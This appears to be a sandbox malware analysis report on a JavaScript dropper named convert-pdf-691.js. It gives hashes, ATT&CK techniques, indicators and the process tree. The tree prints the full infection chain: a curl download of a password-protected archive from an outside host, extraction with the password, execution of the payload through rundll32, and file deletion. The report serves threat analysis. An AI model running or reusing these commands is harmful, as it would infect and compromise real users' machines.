ac99aa6b0162d71f33b1e9b286e9d0ed899ab449ac29040e494c4fb4b9b87d4d

General

Target

convert-pdf-691.js
Size

44KB
MD5

baab807d9799ba81b6cf672d75af688a
SHA1

5a6ebb01034e9ab3b719db948db259fe2fa2e84f
SHA256

ac99aa6b0162d71f33b1e9b286e9d0ed899ab449ac29040e494c4fb4b9b87d4d
SHA512

b06019d06c4945bf62ab2a8116b495d19e3fd95693550a66fa9304b3e193c04b3a4ed4e5b29123e42ab2aff4074f52d10709de5890ec1497c295dfc71e109c57
SSDEEP

384:/2eY5d0Bp7w2l/uYvxsDxb9Q5tbauRFvSefk1EK4s0QDQZWifIPguWYvLETAMg61:uTC3l2yDSef6EMveZgP8UJq58z293l

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
3472	impedit.n

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeRestorePrivilege	3472	impedit.n
Token: 35	3472	impedit.n
Token: SeSecurityPrivilege	3472	impedit.n
Token: SeSecurityPrivilege	3472	impedit.n

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 1860 wrote to memory of 2308	1860	wscript.exe	84
PID 1860 wrote to memory of 2308	1860	wscript.exe	84
PID 1860 wrote to memory of 5100	1860	wscript.exe	86
PID 1860 wrote to memory of 5100	1860	wscript.exe	86
PID 1860 wrote to memory of 824	1860	wscript.exe	89
PID 1860 wrote to memory of 824	1860	wscript.exe	89
PID 824 wrote to memory of 1132	824	cmd.exe	91
PID 824 wrote to memory of 1132	824	cmd.exe	91
PID 1860 wrote to memory of 1584	1860	wscript.exe	95
PID 1860 wrote to memory of 1584	1860	wscript.exe	95
PID 1860 wrote to memory of 3376	1860	wscript.exe	97
PID 1860 wrote to memory of 3376	1860	wscript.exe	97
PID 3376 wrote to memory of 3472	3376	cmd.exe	100
PID 3376 wrote to memory of 3472	3376	cmd.exe	100
PID 3376 wrote to memory of 3472	3376	cmd.exe	100
PID 1860 wrote to memory of 1400	1860	wscript.exe	101
PID 1860 wrote to memory of 1400	1860	wscript.exe	101
PID 1860 wrote to memory of 3736	1860	wscript.exe	103
PID 1860 wrote to memory of 3736	1860	wscript.exe	103
PID 1860 wrote to memory of 2976	1860	wscript.exe	105
PID 1860 wrote to memory of 2976	1860	wscript.exe	105
PID 1860 wrote to memory of 4688	1860	wscript.exe	107
PID 1860 wrote to memory of 4688	1860	wscript.exe	107
PID 1860 wrote to memory of 4780	1860	wscript.exe	108
PID 1860 wrote to memory of 4780	1860	wscript.exe	108

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\convert-pdf-691.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\convert-pdf-691.js"
  2⤵
  PID:2308
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo curl https://getdebtgo.com/wp-content/plugins/bluehost-wordpress-plugin/vendor/wpscholar/url/6006.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatum.h" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\esse.i.bat"
  2⤵
  PID:5100
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\esse.i.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:824
- - C:\Windows\system32\curl.exe
    curl https://getdebtgo.com/wp-content/plugins/bluehost-wordpress-plugin/vendor/wpscholar/url/6006.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatum.h" --ssl-no-revoke --insecure --location
    3⤵
    PID:1132
- C:\Windows\System32\curl.exe
  "C:\Windows\System32\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\Admin\AppData\Local\Temp\impedit.n"
  2⤵
  PID:1584
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Local\Temp\impedit.n" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\Admin\AppData\Local\Temp\voluptatum.h" > "C:\Users\Admin\AppData\Local\Temp\esse.icupiditate.v""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3376
- - C:\Users\Admin\AppData\Local\Temp\impedit.n
    "C:\Users\Admin\AppData\Local\Temp\impedit.n" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\Admin\AppData\Local\Temp\voluptatum.h"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3472
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\impedit.n"
  2⤵
  PID:1400
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\voluptatum.h"
  2⤵
  PID:3736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\esse.icupiditate.v" "esse.i"
  2⤵
  PID:2976
- C:\Windows\System32\rundll32.exe
  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\esse.i", scab /k arbalet875
  2⤵
  PID:4688
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\esse.i.bat"
  2⤵
  PID:4780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\esse.i.bat

Filesize
199B

MD5
2f4003de23fc616ebd1ca0e3730f9313

SHA1
85fe457b0a486c254f84a61a0b1a1375018320e3

SHA256
220f6a2e691cd7f6ee1be619d45cb4ecebca6f59179ef9339a61ee2ddd40a48b

SHA512
0131d0800aeef2a395d10daa8267496655ec03e3fdbf1ec0939fd99b914855275f6081b67faecb241f22c274238219934ba1f17e19066975dda0c6e698bede0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\impedit.n

Filesize
571KB

MD5
58fc6de6c4e5d2fda63565d54feb9e75

SHA1
0586248c327d21efb8787e8ea9f553ddc03493ec

SHA256
72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b

SHA512
e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

Download Submit
C:\Users\Admin\AppData\Local\Temp\impedit.n

Filesize
571KB

MD5
58fc6de6c4e5d2fda63565d54feb9e75

SHA1
0586248c327d21efb8787e8ea9f553ddc03493ec

SHA256
72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b

SHA512
e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

Download Submit
C:\Users\Admin\AppData\Local\Temp\voluptatum.h

Filesize
98KB

MD5
f793361dec5ce5b6e23a5b3db99cbd7e

SHA1
e60a1507015a7bcdbebb3af63b2c2473914b8e5e

SHA256
cff8e910e3a811e935984a72437866f8bf76c419e2a3947b4e5ed7275963b590

SHA512
bd0bc32d7fa0061fe615dd3be46bd801b8ddf008e22f0473c032cc5bc9630af3c67cbdacfaed0cc01ae46370c8e87b45dd6c34ff0e157c619308ca03fd8e35ec

Download Submit

Analysis

Sharing